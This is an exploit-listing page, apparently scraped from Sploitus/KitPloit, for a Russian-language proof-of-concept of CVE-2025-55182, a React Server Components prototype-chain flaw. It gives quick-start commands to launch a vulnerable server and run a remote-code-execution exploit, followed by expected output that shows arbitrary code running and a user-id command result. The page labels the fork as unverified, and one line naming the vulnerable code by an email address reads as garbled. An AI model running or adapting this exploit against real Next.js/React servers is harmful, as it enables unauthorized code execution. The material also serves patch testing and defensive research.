Sploitus

exploit-CVE-2025-55182-poc

kitploit · 2026-08-31

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PA2SW0RD-EXPLOIT-CVE-2025-55182-POC
# CVE-2025-55182 - Уязвимость цепочки прототипов React Server Components

Этот PoC демонстрирует CVE-2025-55182 с использованием уязвимого кода `some-email@example.com`.

Руководство по экстренному исправлению CVE-2025-55182: полный анализ и смягчение для уязвимости Next.js/React RSC (CVSS 10.0)

Этот репозиторий является форком https://github.com/ejpir/CVE-2025-55182-poc и ещё не проверен! Пожалуйста, будьте осторожны и тщательно проверяйте!

## Быстрый старт

root@kitploit:~
    
    
    # Install dependencies
    npm install
    
    # Start vulnerable server (port 3002)
    npm start
    
    # Run RCE exploit
    npm run exploit
    

### Ожидаемый вывод

root@kitploit:~
    
    
    === CVE-2025-55182 - RCE через vm.runInThisContext ===
    
    Test 1: Прямой вызов vm#runInThisContext с кодом
    1+1 = {"success":true,"result":"2"}
    
    Test 2: vm.runInThisContext с require
    RCE attempt: {"success":true,"result":"uid=501(nick) gid=20(staff)..."}